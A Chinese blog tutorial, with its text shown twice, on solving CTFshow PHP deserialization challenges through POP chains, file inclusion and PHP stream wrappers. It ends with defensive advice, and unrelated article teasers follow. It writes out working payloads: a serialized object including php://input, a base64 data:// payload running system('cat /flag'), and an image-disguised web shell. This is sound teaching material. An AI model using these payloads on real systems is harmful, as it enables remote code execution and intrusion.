1. 项目概述从靶场到实战的PHP反序列化漏洞通关手册最近在复盘CTFshow F5杯的“eazy-unserialize”系列题目这两道题可以说是把PHP反序列化漏洞的经典利用链和进阶玩法串了个遍。从最基础的魔术方法触发到利用__destruct或__wakeup作为跳板再到结合文件包含File Inclusion和PHP内置协议PHP Wrappers进行深度利用整个过程就像在搭一个精密的多米诺骨牌。很多刚接触Web安全的朋友一看到反序列化就头疼觉得概念抽象、利用链复杂。其实只要你把几个关键“机关”的位置和触发顺序搞明白剩下的就是按图索骥的“组装”工作。这篇文章我就以这两道题为蓝本拆解从漏洞发现到最终利用的完整链条并重点分享在文件包含与协议利用环节那些容易踩坑的细节。无论你是正在打CTF的赛棍还是想夯实Web安全基础的开发者这篇避坑指南都能帮你把这条路走通、走顺。2. 核心漏洞原理与CTFshow题目环境搭建2.1 PHP反序列化漏洞的本质对象重建与魔术方法要利用漏洞先得明白漏洞从哪来。PHP反序列化函数unserialize()的作用是将一个序列化后的字符串还原成一个PHP值通常是对象。这个“还原”过程就潜藏着风险。序列化字符串里包含了对象的类名、属性及其值。当unserialize()处理一个包含对象数据的字符串时PHP需要根据类名去找到对应的类定义并实例化一个对象然后把属性值填进去。关键在于PHP中有一类特殊的函数叫做魔术方法Magic Methods。它们在对象生命周期的特定时刻会被自动调用。与反序列化漏洞最相关的几个是__wakeup(): 当unserialize()函数成功还原一个对象后如果该对象的类中定义了此方法则会立即自动调用。常用来重新建立数据库连接或初始化资源。__destruct(): 当对象被销毁时如脚本执行结束、对象被unset或没有引用指向它时自动调用。这是最常用的“跳板”之一因为它的触发相对确定。__toString(): 当一个对象被当作字符串处理时如echo $obj自动调用。漏洞的根源就在于攻击者可以构造一个恶意的序列化字符串。当这个字符串被unserialize()还原时攻击者可以控制对象的属性值。如果这个对象的类或者其继承的父类、使用的特质中存在上述魔术方法并且这些方法中的代码使用了对象属性那么攻击者就能通过控制属性值来影响这些代码的执行流程最终可能实现任意代码执行RCE、文件操作等危害。举个例子假设一个类FileHandler有一个__destruct方法会删除$this-filename指定的文件。如果$filename属性用户可控那么攻击者通过反序列化传入一个filename为../../../etc/passwd的对象就可能造成任意文件删除。2.2 CTFshow F5杯“eazy-unserialize”场景复现CTFshow的题目通常会把漏洞场景模拟得非常清晰。“eazy-unserialize”的第一题往往是一个直接的反序列化入口。你可能看到一个接收data参数的接口代码逻辑大致如下?php highlight_file(__FILE__); class Welcome{ public $name; public $arg; function __wakeup(){ $this-name Welcome to CTFshow!; } function __destruct(){ echo $this-name; } } if(isset($_GET[data])){ $data $_GET[data]; unserialize($data); } else { $w new Welcome(); $w-name Hello; echo serialize($w); } ?这段代码提供了一个“示例输出”和漏洞入口。我们的目标通常是利用__destruct或__wakeup方法。但这里有个小坑__wakeup在反序列化后立刻执行它会将$name强制改为固定字符串覆盖了我们传入的值。所以直接利用__destruct中的echo $this-name似乎行不通因为name已经被改了。第一个避坑点绕过__wakeup在PHP版本小于5.6.25或7.x小于7.0.10的特定环境下存在一个CVE-2016-7124漏洞。当序列化字符串中表示对象属性数量的值大括号内的那个数字大于实际属性数量时__wakeup()方法将不会被执行。这是早期CTF中常见的绕过技巧。虽然现代环境已修复但靶场为了教学常会复现此环境。对于本题我们可以构造O:7:Welcome:2:{s:4:name;s:10:HackedName;s:3:arg;N;}注意这里的2而类中实际只有$name和$arg两个属性但我们将数量写为2在某些特定版本下大于2才有效这里需根据环境测试可能触发绕过使得__wakeup失效__destruct中输出的就是我们传入的HackedName。但这只是热身。真正的挑战在于如何从一个简单的echo或属性操作跳转到更有危害的操作比如文件包含。3. 利用链构造从反序列化到文件包含的桥梁3.1 寻找POP链的入口与跳板单一的类往往很难直接完成利用。我们需要寻找一条“属性到属性”的调用链即POP链Property-Oriented Programming。核心思路是控制A对象的属性a使其值为B对象。当A的魔术方法如__toString被触发时它可能会对属性a进行操作比如echo $this-a而如果$this-a是一个B对象那么触发B对象的__toString方法从而将执行流导向B类。在“eazy-unserialize”的第二题或更复杂的场景中题目可能会提供多个类或者暗示存在其他可用的内置类PHP Native Classes。关键步骤审计源码寻找所有定义了__wakeup、__destruct、__toString、__call、__get、__set等魔术方法的类。分析敏感操作在这些魔术方法中寻找诸如include($this-file)、file_get_contents($this-url)、system($this-cmd)、eval($this-code)等函数调用。这些是理想的目标终点。连接调用链如果终点如include所在的类无法直接从我们的入口点触发就需要寻找中间类。例如入口类A的__destruct中有echo $this-obj而$this-obj可以被我们控制为类B的对象。类B的__toString方法中恰好有include $this-file。这样链子就形成了unserialize-A::__destruct-echo $this-obj-B::__toString-include($this-file)。3.2 利用内置类与文件包含漏洞当题目没有提供明显包含文件操作函数的类时我们需要转向PHP的内置类。一个著名的利器是SplFileObject类。但这个类通常用于读取文件我们需要的是包含并执行PHP代码。这时就需要结合文件包含漏洞。假设我们通过POP链最终能控制一个include或require语句的参数$this-file。这就是一个本地文件包含LFI漏洞。单纯的LFI可以读取源码但要执行代码我们需要让被包含的文件内容是有效的PHP代码。经典利用方式结合文件上传如果网站存在图片上传功能我们可以上传一个内容为?php phpinfo();?的图片文件如shell.jpg。通过LFI漏洞包含这个上传的图片文件。因为include会将被包含文件的内容当作PHP代码来解析只要该文件被PHP引擎处理从而执行我们的代码。在CTF中上传点可能被限制但有时可以通过日志文件注入或PHP内置协议来绕过。4. 协议利用的魔法php://filter与php://input这是PHP反序列化结合文件包含中最强大、也最容易出错的环节。PHP提供了一系列封装协议Wrappers允许以流的方式访问各种数据源。4.1 php://filter 的读取与编码转换php://filter是一个元封装器设计用于数据流打开时的筛选过滤应用。在文件包含中它主要有两大用途1. 读取源码绕过死亡代码当网站使用include包含文件但被包含的文件内容被直接echo出来而不是作为代码执行时我们可以用php://filter来读取其源码。例如题目包含?fileindex.php但输出的是渲染后的HTML。我们可以尝试?filephp://filter/readconvert.base64-encode/resourceindex.php这个路径会让PHP先读取index.php文件的内容然后经过convert.base64-encode过滤器进行Base64编码最后输出。这样我们就得到了Base64编码后的源码解码即可查看。这在CTF中常用于读取关键配置文件、数据库连接信息或flag位置。2. 构造可执行的有效载荷更巧妙的用法是我们可以利用过滤器链将一个非PHP文件甚至是我们输入的字符串转换成包含有效PHP代码的“文件流”然后被include执行。例如我们有一个可控的$file变量被include($file)。我们可以传入php://filter/readconvert.base64-decode/resourcedata://,PD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKTs/Pg这里嵌套了data://协议和convert.base64-decode过滤器。data://,PD9waHA...是?php system(cat /flag);?的Base64编码。readconvert.base64-decode会先对这个Base64字符串进行解码还原出原始的PHP代码。当这个解码后的流被include时其中的PHP标签和代码就会被执行。避坑重点过滤器链的拼接与顺序php://filter可以串联多个过滤器格式为/readfilter1|filter2|filter3/resource...。过滤器的执行顺序是从左到右。例如你想先压缩再Base64编码顺序就是zlib.deflate|convert.base64-encode。顺序错了会导致数据无法被正确解析。在构造复杂Payload时务必理清数据处理流程。4.2 php://input 的直接代码执行php://input是一个只读流用于访问请求的原始数据即HTTP POST请求的body部分。当allow_url_include配置为On时CTF靶场常为此设置它可以被include或require。利用方式发送一个POST请求。将请求的URL参数设置为?filephp://input。在POST Body中直接写入要执行的PHP代码例如?php system(ls /);?。当include遇到php://input时它会去读取POST Body的内容并将其作为PHP文件内容来执行。这是一种非常直接的代码执行方式无需任何文件落地。避坑重点allow_url_include与allow_url_fopenallow_url_include必须为On才能include远程文件或php://input这类流。这是最关键的一环。allow_url_fopen通常也需要为On它影响fopen等函数对URL的打开能力部分流包装器的使用也依赖于此。 在实战或CTF中如果发现php://input利用失败首先应该检查这两个配置。可以通过phpinfo()页面或利用已有的文件包含读取/proc/self/environLinux等方式来获取PHP配置信息。5. 完整实战演练与Payload构造让我们串联一个从CTFshow题目中抽象出的完整场景入口点存在unserialize($_GET[data])。可利用类class VulnClass { public $cache_file; function __destruct() { include($this-cache_file); } } class Helper { public $handle; function __toString() { return $this-handle-getContents(); } }目标执行系统命令读取/flag。步骤1分析链子VulnClass::__destruct中有include是理想终点。我们需要让$cache_file的内容被当作PHP代码执行。Helper::__toString本身不危险但它可以作为一个跳板。如果我们能让某个echo或字符串操作触发Helper对象的__toString并且我们能控制$handle或许能将其指向一个包含代码的流。步骤2构造POP链假设题目中还有一个Logger类其__destruct会echo $this-msg。我们可以构造$logger new Logger();$logger-msg new Helper();// 触发Helper::__toString但Helper::__toString只是返回$handle-getContents()这需要$handle是一个有getContents方法的对象。我们可以尝试使用内置类SplFileObject但它读取的是文件内容不是代码执行。更直接的思路我们能否直接控制VulnClass的$cache_file但入口点是unserialize我们需要先实例化VulnClass。如果代码中同时存在VulnClass和Logger我们可以让Logger-msg设置为一个VulnClass对象吗不行因为echo一个对象会触发其__toString而VulnClass没有__toString会报错。步骤3简化利用假设可以直接触发VulnClass如果我们能直接让unserialize生成一个VulnClass对象并控制其$cache_file属性那么问题就简化为如何让include($this-cache_file)执行任意代码。方案A文件上传上传shell.jpg内容为?php system($_GET[‘c’]);?然后设置$cache_file为上传文件的路径如/var/www/html/uploads/shell.jpg。访问时带上?ccat /flag。方案Bphp://input设置$cache_file为php://input。在发送序列化数据的同时在POST Body中写入?php system(‘cat /flag’);?。方案Cphp://filter data://设置$cache_file为php://filter/readconvert.base64-decode/resourcedata://,PD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKTs/Pg。步骤4构造最终Payload假设我们可以直接序列化VulnClass$exp new VulnClass(); $exp-cache_file ‘php://input’; echo urlencode(serialize($exp)); // 输出O%3A9%3A%22VulnClass%22%3A1%3A%7Bs%3A10%3A%22cache_file%22%3Bs%3A11%3A%22php%3A%2F%2Finput%22%3B%7D发送请求GET /vuln.php?dataO%3A9%3A%22VulnClass%22%3A1%3A%7Bs%3A10%3A%22cache_file%22%3Bs%3A11%3A%22php%3A%2F%2Finput%22%3B%7D POST Body: ?php system(‘cat /flag’);?6. 常见问题排查与防御建议6.1 实战中可能遇到的坑Payload提交后无回显检查协议确认使用的是http://还是https://靶场环境可能不支持https。检查编码序列化字符串中的字符计数必须精确。例如s:4:“name”表示一个长度为4的字符串name多一个少一个空格都会导致反序列化失败。使用serialize()函数生成最保险手动构造时务必小心。检查魔术引号虽然现代PHP已移除magic_quotes_gpc但一些老旧环境或特殊配置可能过滤了引号。确保Payload中的引号是正常的必要时使用URL编码。查看错误信息开启display_errorsCTF中有时会开启或尝试触发一个警告来获取路径信息。文件包含失败路径问题使用绝对路径还是相对路径include的相对路径是基于当前工作目录还是包含文件的目录在Web中通常是基于当前执行脚本的目录。多用../进行目录遍历尝试。文件后缀限制代码中可能有include($file . ‘.php’)这样的拼接。这时需要利用空字节截断%00仅PHP5.3.4有效或路径长度截断超长路径来绕过但现代PHP版本已修复。更通用的方法是利用协议封装器因为php://filter/...后面不跟后缀名。allow_url_include为Off这是最硬性的限制。如果为Off则php://input和远程URL包含均无效。此时只能寻找真正的文件上传点或利用本地文件如日志、Session文件注入PHP代码后再包含。POP链构造复杂找不到头绪使用工具辅助对于已知框架如Laravel, ThinkPHP, Yii等的反序列化链已有成熟的工具如phpggc可以生成Payload。对于代码审计可以寻找自动化的POP链挖掘工具或插件。从终点反向推导先找到包含eval、system、include等危险函数的方法然后看哪些魔术方法能调用到这个方法或者能操作这个类的对象一步步回溯到入口点。6.2 给开发者的防御建议永远不要反序列化不可信数据这是根本原则。如果业务必须使用序列化考虑使用JSON等更安全的格式。使用安全的反序列化函数PHP的unserialize()本身不安全。如果可能使用json_decode()。对于对象持久化可以考虑使用__sleep和__wakeup方法进行严格的属性白名单校验。实施严格的输入过滤如果无法避免使用unserialize确保输入数据来自可信源并在反序列化前进行严格的格式和签名验证。禁用危险函数和协议在生产环境中将allow_url_include和allow_url_fopen设置为Off。在php.ini的disable_functions中禁用eval、system、exec、shell_exec等危险函数。及时更新和打补丁保持PHP版本和所用框架、库的最新状态及时修复已知的反序列化漏洞如ThinkPHP, Laravel, WordPress插件中的相关漏洞。进行代码审计在代码中搜索unserialize函数检查其参数是否用户可控。审计所有魔术方法确保其中没有将对象属性不加校验地传递给危险函数。反序列化漏洞的利用是一个逻辑严密的“拼图”过程。从CTFshow这类靶场题入手理解每一个魔术方法的触发时机掌握文件包含与协议利用的细节再结合实战中的各种限制和绕过技巧你就能建立起一套完整的漏洞挖掘与利用思维。最重要的是在理解攻击原理的基础上写出更安全的代码。
PHP反序列化漏洞实战:从魔术方法到文件包含与协议利用
发布时间:2026/6/23 9:57:18
1. 项目概述从靶场到实战的PHP反序列化漏洞通关手册最近在复盘CTFshow F5杯的“eazy-unserialize”系列题目这两道题可以说是把PHP反序列化漏洞的经典利用链和进阶玩法串了个遍。从最基础的魔术方法触发到利用__destruct或__wakeup作为跳板再到结合文件包含File Inclusion和PHP内置协议PHP Wrappers进行深度利用整个过程就像在搭一个精密的多米诺骨牌。很多刚接触Web安全的朋友一看到反序列化就头疼觉得概念抽象、利用链复杂。其实只要你把几个关键“机关”的位置和触发顺序搞明白剩下的就是按图索骥的“组装”工作。这篇文章我就以这两道题为蓝本拆解从漏洞发现到最终利用的完整链条并重点分享在文件包含与协议利用环节那些容易踩坑的细节。无论你是正在打CTF的赛棍还是想夯实Web安全基础的开发者这篇避坑指南都能帮你把这条路走通、走顺。2. 核心漏洞原理与CTFshow题目环境搭建2.1 PHP反序列化漏洞的本质对象重建与魔术方法要利用漏洞先得明白漏洞从哪来。PHP反序列化函数unserialize()的作用是将一个序列化后的字符串还原成一个PHP值通常是对象。这个“还原”过程就潜藏着风险。序列化字符串里包含了对象的类名、属性及其值。当unserialize()处理一个包含对象数据的字符串时PHP需要根据类名去找到对应的类定义并实例化一个对象然后把属性值填进去。关键在于PHP中有一类特殊的函数叫做魔术方法Magic Methods。它们在对象生命周期的特定时刻会被自动调用。与反序列化漏洞最相关的几个是__wakeup(): 当unserialize()函数成功还原一个对象后如果该对象的类中定义了此方法则会立即自动调用。常用来重新建立数据库连接或初始化资源。__destruct(): 当对象被销毁时如脚本执行结束、对象被unset或没有引用指向它时自动调用。这是最常用的“跳板”之一因为它的触发相对确定。__toString(): 当一个对象被当作字符串处理时如echo $obj自动调用。漏洞的根源就在于攻击者可以构造一个恶意的序列化字符串。当这个字符串被unserialize()还原时攻击者可以控制对象的属性值。如果这个对象的类或者其继承的父类、使用的特质中存在上述魔术方法并且这些方法中的代码使用了对象属性那么攻击者就能通过控制属性值来影响这些代码的执行流程最终可能实现任意代码执行RCE、文件操作等危害。举个例子假设一个类FileHandler有一个__destruct方法会删除$this-filename指定的文件。如果$filename属性用户可控那么攻击者通过反序列化传入一个filename为../../../etc/passwd的对象就可能造成任意文件删除。2.2 CTFshow F5杯“eazy-unserialize”场景复现CTFshow的题目通常会把漏洞场景模拟得非常清晰。“eazy-unserialize”的第一题往往是一个直接的反序列化入口。你可能看到一个接收data参数的接口代码逻辑大致如下?php highlight_file(__FILE__); class Welcome{ public $name; public $arg; function __wakeup(){ $this-name Welcome to CTFshow!; } function __destruct(){ echo $this-name; } } if(isset($_GET[data])){ $data $_GET[data]; unserialize($data); } else { $w new Welcome(); $w-name Hello; echo serialize($w); } ?这段代码提供了一个“示例输出”和漏洞入口。我们的目标通常是利用__destruct或__wakeup方法。但这里有个小坑__wakeup在反序列化后立刻执行它会将$name强制改为固定字符串覆盖了我们传入的值。所以直接利用__destruct中的echo $this-name似乎行不通因为name已经被改了。第一个避坑点绕过__wakeup在PHP版本小于5.6.25或7.x小于7.0.10的特定环境下存在一个CVE-2016-7124漏洞。当序列化字符串中表示对象属性数量的值大括号内的那个数字大于实际属性数量时__wakeup()方法将不会被执行。这是早期CTF中常见的绕过技巧。虽然现代环境已修复但靶场为了教学常会复现此环境。对于本题我们可以构造O:7:Welcome:2:{s:4:name;s:10:HackedName;s:3:arg;N;}注意这里的2而类中实际只有$name和$arg两个属性但我们将数量写为2在某些特定版本下大于2才有效这里需根据环境测试可能触发绕过使得__wakeup失效__destruct中输出的就是我们传入的HackedName。但这只是热身。真正的挑战在于如何从一个简单的echo或属性操作跳转到更有危害的操作比如文件包含。3. 利用链构造从反序列化到文件包含的桥梁3.1 寻找POP链的入口与跳板单一的类往往很难直接完成利用。我们需要寻找一条“属性到属性”的调用链即POP链Property-Oriented Programming。核心思路是控制A对象的属性a使其值为B对象。当A的魔术方法如__toString被触发时它可能会对属性a进行操作比如echo $this-a而如果$this-a是一个B对象那么触发B对象的__toString方法从而将执行流导向B类。在“eazy-unserialize”的第二题或更复杂的场景中题目可能会提供多个类或者暗示存在其他可用的内置类PHP Native Classes。关键步骤审计源码寻找所有定义了__wakeup、__destruct、__toString、__call、__get、__set等魔术方法的类。分析敏感操作在这些魔术方法中寻找诸如include($this-file)、file_get_contents($this-url)、system($this-cmd)、eval($this-code)等函数调用。这些是理想的目标终点。连接调用链如果终点如include所在的类无法直接从我们的入口点触发就需要寻找中间类。例如入口类A的__destruct中有echo $this-obj而$this-obj可以被我们控制为类B的对象。类B的__toString方法中恰好有include $this-file。这样链子就形成了unserialize-A::__destruct-echo $this-obj-B::__toString-include($this-file)。3.2 利用内置类与文件包含漏洞当题目没有提供明显包含文件操作函数的类时我们需要转向PHP的内置类。一个著名的利器是SplFileObject类。但这个类通常用于读取文件我们需要的是包含并执行PHP代码。这时就需要结合文件包含漏洞。假设我们通过POP链最终能控制一个include或require语句的参数$this-file。这就是一个本地文件包含LFI漏洞。单纯的LFI可以读取源码但要执行代码我们需要让被包含的文件内容是有效的PHP代码。经典利用方式结合文件上传如果网站存在图片上传功能我们可以上传一个内容为?php phpinfo();?的图片文件如shell.jpg。通过LFI漏洞包含这个上传的图片文件。因为include会将被包含文件的内容当作PHP代码来解析只要该文件被PHP引擎处理从而执行我们的代码。在CTF中上传点可能被限制但有时可以通过日志文件注入或PHP内置协议来绕过。4. 协议利用的魔法php://filter与php://input这是PHP反序列化结合文件包含中最强大、也最容易出错的环节。PHP提供了一系列封装协议Wrappers允许以流的方式访问各种数据源。4.1 php://filter 的读取与编码转换php://filter是一个元封装器设计用于数据流打开时的筛选过滤应用。在文件包含中它主要有两大用途1. 读取源码绕过死亡代码当网站使用include包含文件但被包含的文件内容被直接echo出来而不是作为代码执行时我们可以用php://filter来读取其源码。例如题目包含?fileindex.php但输出的是渲染后的HTML。我们可以尝试?filephp://filter/readconvert.base64-encode/resourceindex.php这个路径会让PHP先读取index.php文件的内容然后经过convert.base64-encode过滤器进行Base64编码最后输出。这样我们就得到了Base64编码后的源码解码即可查看。这在CTF中常用于读取关键配置文件、数据库连接信息或flag位置。2. 构造可执行的有效载荷更巧妙的用法是我们可以利用过滤器链将一个非PHP文件甚至是我们输入的字符串转换成包含有效PHP代码的“文件流”然后被include执行。例如我们有一个可控的$file变量被include($file)。我们可以传入php://filter/readconvert.base64-decode/resourcedata://,PD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKTs/Pg这里嵌套了data://协议和convert.base64-decode过滤器。data://,PD9waHA...是?php system(cat /flag);?的Base64编码。readconvert.base64-decode会先对这个Base64字符串进行解码还原出原始的PHP代码。当这个解码后的流被include时其中的PHP标签和代码就会被执行。避坑重点过滤器链的拼接与顺序php://filter可以串联多个过滤器格式为/readfilter1|filter2|filter3/resource...。过滤器的执行顺序是从左到右。例如你想先压缩再Base64编码顺序就是zlib.deflate|convert.base64-encode。顺序错了会导致数据无法被正确解析。在构造复杂Payload时务必理清数据处理流程。4.2 php://input 的直接代码执行php://input是一个只读流用于访问请求的原始数据即HTTP POST请求的body部分。当allow_url_include配置为On时CTF靶场常为此设置它可以被include或require。利用方式发送一个POST请求。将请求的URL参数设置为?filephp://input。在POST Body中直接写入要执行的PHP代码例如?php system(ls /);?。当include遇到php://input时它会去读取POST Body的内容并将其作为PHP文件内容来执行。这是一种非常直接的代码执行方式无需任何文件落地。避坑重点allow_url_include与allow_url_fopenallow_url_include必须为On才能include远程文件或php://input这类流。这是最关键的一环。allow_url_fopen通常也需要为On它影响fopen等函数对URL的打开能力部分流包装器的使用也依赖于此。 在实战或CTF中如果发现php://input利用失败首先应该检查这两个配置。可以通过phpinfo()页面或利用已有的文件包含读取/proc/self/environLinux等方式来获取PHP配置信息。5. 完整实战演练与Payload构造让我们串联一个从CTFshow题目中抽象出的完整场景入口点存在unserialize($_GET[data])。可利用类class VulnClass { public $cache_file; function __destruct() { include($this-cache_file); } } class Helper { public $handle; function __toString() { return $this-handle-getContents(); } }目标执行系统命令读取/flag。步骤1分析链子VulnClass::__destruct中有include是理想终点。我们需要让$cache_file的内容被当作PHP代码执行。Helper::__toString本身不危险但它可以作为一个跳板。如果我们能让某个echo或字符串操作触发Helper对象的__toString并且我们能控制$handle或许能将其指向一个包含代码的流。步骤2构造POP链假设题目中还有一个Logger类其__destruct会echo $this-msg。我们可以构造$logger new Logger();$logger-msg new Helper();// 触发Helper::__toString但Helper::__toString只是返回$handle-getContents()这需要$handle是一个有getContents方法的对象。我们可以尝试使用内置类SplFileObject但它读取的是文件内容不是代码执行。更直接的思路我们能否直接控制VulnClass的$cache_file但入口点是unserialize我们需要先实例化VulnClass。如果代码中同时存在VulnClass和Logger我们可以让Logger-msg设置为一个VulnClass对象吗不行因为echo一个对象会触发其__toString而VulnClass没有__toString会报错。步骤3简化利用假设可以直接触发VulnClass如果我们能直接让unserialize生成一个VulnClass对象并控制其$cache_file属性那么问题就简化为如何让include($this-cache_file)执行任意代码。方案A文件上传上传shell.jpg内容为?php system($_GET[‘c’]);?然后设置$cache_file为上传文件的路径如/var/www/html/uploads/shell.jpg。访问时带上?ccat /flag。方案Bphp://input设置$cache_file为php://input。在发送序列化数据的同时在POST Body中写入?php system(‘cat /flag’);?。方案Cphp://filter data://设置$cache_file为php://filter/readconvert.base64-decode/resourcedata://,PD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKTs/Pg。步骤4构造最终Payload假设我们可以直接序列化VulnClass$exp new VulnClass(); $exp-cache_file ‘php://input’; echo urlencode(serialize($exp)); // 输出O%3A9%3A%22VulnClass%22%3A1%3A%7Bs%3A10%3A%22cache_file%22%3Bs%3A11%3A%22php%3A%2F%2Finput%22%3B%7D发送请求GET /vuln.php?dataO%3A9%3A%22VulnClass%22%3A1%3A%7Bs%3A10%3A%22cache_file%22%3Bs%3A11%3A%22php%3A%2F%2Finput%22%3B%7D POST Body: ?php system(‘cat /flag’);?6. 常见问题排查与防御建议6.1 实战中可能遇到的坑Payload提交后无回显检查协议确认使用的是http://还是https://靶场环境可能不支持https。检查编码序列化字符串中的字符计数必须精确。例如s:4:“name”表示一个长度为4的字符串name多一个少一个空格都会导致反序列化失败。使用serialize()函数生成最保险手动构造时务必小心。检查魔术引号虽然现代PHP已移除magic_quotes_gpc但一些老旧环境或特殊配置可能过滤了引号。确保Payload中的引号是正常的必要时使用URL编码。查看错误信息开启display_errorsCTF中有时会开启或尝试触发一个警告来获取路径信息。文件包含失败路径问题使用绝对路径还是相对路径include的相对路径是基于当前工作目录还是包含文件的目录在Web中通常是基于当前执行脚本的目录。多用../进行目录遍历尝试。文件后缀限制代码中可能有include($file . ‘.php’)这样的拼接。这时需要利用空字节截断%00仅PHP5.3.4有效或路径长度截断超长路径来绕过但现代PHP版本已修复。更通用的方法是利用协议封装器因为php://filter/...后面不跟后缀名。allow_url_include为Off这是最硬性的限制。如果为Off则php://input和远程URL包含均无效。此时只能寻找真正的文件上传点或利用本地文件如日志、Session文件注入PHP代码后再包含。POP链构造复杂找不到头绪使用工具辅助对于已知框架如Laravel, ThinkPHP, Yii等的反序列化链已有成熟的工具如phpggc可以生成Payload。对于代码审计可以寻找自动化的POP链挖掘工具或插件。从终点反向推导先找到包含eval、system、include等危险函数的方法然后看哪些魔术方法能调用到这个方法或者能操作这个类的对象一步步回溯到入口点。6.2 给开发者的防御建议永远不要反序列化不可信数据这是根本原则。如果业务必须使用序列化考虑使用JSON等更安全的格式。使用安全的反序列化函数PHP的unserialize()本身不安全。如果可能使用json_decode()。对于对象持久化可以考虑使用__sleep和__wakeup方法进行严格的属性白名单校验。实施严格的输入过滤如果无法避免使用unserialize确保输入数据来自可信源并在反序列化前进行严格的格式和签名验证。禁用危险函数和协议在生产环境中将allow_url_include和allow_url_fopen设置为Off。在php.ini的disable_functions中禁用eval、system、exec、shell_exec等危险函数。及时更新和打补丁保持PHP版本和所用框架、库的最新状态及时修复已知的反序列化漏洞如ThinkPHP, Laravel, WordPress插件中的相关漏洞。进行代码审计在代码中搜索unserialize函数检查其参数是否用户可控。审计所有魔术方法确保其中没有将对象属性不加校验地传递给危险函数。反序列化漏洞的利用是一个逻辑严密的“拼图”过程。从CTFshow这类靶场题入手理解每一个魔术方法的触发时机掌握文件包含与协议利用的细节再结合实战中的各种限制和绕过技巧你就能建立起一套完整的漏洞挖掘与利用思维。最重要的是在理解攻击原理的基础上写出更安全的代码。
相关文章
WorkBuddy:不养龙虾的本地AI助手如何实现轻量协同推理
1. 为什么“不养龙虾”成了本地AI助手的分水岭最近在几个技术群和产品讨论区里,反复看到一句有点反常识的话:“不养龙虾”。起初我以为是梗图或者谐音玩笑,直到连续三天在不同场景下——一位做教育SaaS的CTO发朋友圈说“我们团队刚把Llama3-7…
AI‘学会闭嘴’:三道安全阀降低幻觉率50%
1. 标题里的“GPT-5.5 Instant”根本不存在——但这个说法精准戳中了当前AI落地最痛的神经 “GPT-5.5 Instant 来了:幻觉率降了一半,AI开始学会‘闭嘴’了”——这标题一出来,朋友圈刷屏、科技媒体转发、产品经理连夜改PRD。可我打开OpenAI官…
Claude Managed Agents:企业IT可控AI落地实践指南
1. 别被“Managed Agents”这个词唬住:它不是新AI,而是IT团队的旧工具箱升级版“Claude Managed Agents”这个短语一出来,很多IT同事第一反应是:又一个AI营销新词?是不是又要学新API、配新服务、写新Orchestration逻辑…
最大抖动低至1微秒,望获OS支持奥特思AnyControl EtherCAT运动控制主站
近日,望获OS团队宣布旗下望获rtLinux实时操作系统完成与北京奥特思AnyControl EtherCAT Master协议栈深度适配,在飞腾平台完成长期稳定性验证,正式推出一套亚微秒级硬实时、全自主可控的国产 EtherCAT 多轴运动控制一体化解决方案,…
Trae与Skill:Go原生智能任务执行体与可部署技能单元解析
1. Trae 是什么?先别急着装,搞清它和 Skill 的真实关系 Trae 这个名字最近在 Go 开发者圈里突然密集出现,但翻遍 GitHub、官方文档甚至中文技术社区,你很难找到一份清晰、不带营销话术的定义。我花了三天时间,把所有能…
一个实验搞懂 Docker 和 K8s 怎么配合
🗂️ 我的项目目录(12 个关键文件)text/root/message-board/ │ ├── backend/ ← 【Docker 相关】打包后端用的 │ ├── Dockerfile ← 告诉 Docker 怎么打包后端 │ ├── package.jso…
华尔街神秘量化公司 Jane Street:押注 AI 基建与模型,投资回报超 50 倍!
突发:量化公司的 AI 投资之问如果梁文锋掌管的幻方量化,没有去做大模型,而是去做了投资,会有怎样的结果?这是个很有意思的问题。华尔街一家量化交易公司 Jane Street,不仅净收益高达 396 亿美元,…
AI 写代码又快又好?你可能少了最关键的一步
AI 写代码又快又好?你可能少了最关键的一步 AI 10 分钟写完一个 CRUD 模块,编译通过,启动正常,上线一周后出了 bug——某个边界条件没人测过,AI 也没写测试。 目录 AI-coding 的工程化问题测试全景:不只是…
京东自动化脚本神器Thread:免费解放双手,轻松搞定每日任务
京东自动化脚本神器Thread:免费解放双手,轻松搞定每日任务 【免费下载链接】Thread default 项目地址: https://gitcode.com/gh_mirrors/th/Thread Thread项目是一款功能强大的京东自动化脚本工具,能够帮助用户轻松实现京东平台的签到…
AI谈判中透明度与人格特质如何影响人机信任与合作
1. 项目概述:当AI成为谈判桌上的“新同事”最近几年,AI从后台的“计算器”逐渐走向前台,开始扮演“协作者”甚至“谈判者”的角色。无论是电商平台的智能议价客服,还是企业内部用于采购、资源分配的自动化谈判代理,人机…
跨平台Java开发:构建无处不在的应用
在当今数字化时代,应用的跨平台能力已成为企业竞争的关键因素。无论是移动设备、桌面系统还是嵌入式设备,用户都期望能够无缝访问他们喜爱的应用。Java,作为一种成熟且强大的编程语言,凭借其“一次编写,到处运行”的核…
解锁学术高效写法!paperxie智能写作,搞定毕业论文全程难题
paperxie-免费查重复率aigc检测/开题报告/毕业论文/智能排版/文献综述/课程论文毕业论文 - PaperXie智能写作PaperXieAi论文智能生成软件,10分钟生成万字毕业论文、期刊论文、文献综述、PPT,Aigc查重、降重报告、文献资料。只需一个标题,从开…
Google AI Studio 300美元额度的真相与实战指南
1. 这300美金不是“送钱”,而是Google埋下的第一道技术门槛 你看到标题里那个醒目的“$300美金”时,第一反应可能是:又一个免费额度?领完就完事?我亲手试过——这300美金根本不是红包,而是一张入场券&…
PDF对比终极指南:用diff-pdf轻松识别文档差异的完整教程
PDF对比终极指南:用diff-pdf轻松识别文档差异的完整教程 【免费下载链接】diff-pdf A simple tool for visually comparing two PDF files 项目地址: https://gitcode.com/gh_mirrors/di/diff-pdf 还在为PDF文档的版本对比而烦恼吗?diff-pdf这款开…
嵌入式GUI控件实战:ROTARY、SCROLLBAR、SLIDER原理与应用
1. 嵌入式GUI控件:从原理到实战的深度解析在嵌入式系统开发中,图形用户界面(GUI)的设计与实现往往是项目从“能用”到“好用”的关键一跃。不同于资源充沛的PC或移动平台,嵌入式设备的GUI需要在有限的CPU性能、内存空间…
Zotero Duplicates Merger:5步彻底清理文献库重复条目
Zotero Duplicates Merger:5步彻底清理文献库重复条目 【免费下载链接】ZoteroDuplicatesMerger A zotero plugin to automatically merge duplicate items 项目地址: https://gitcode.com/gh_mirrors/zo/ZoteroDuplicatesMerger 还在为文献库中堆积如山的重…
利用随机有限集理论对蜂群的ILQR和MPC控制研究附Matlab代码
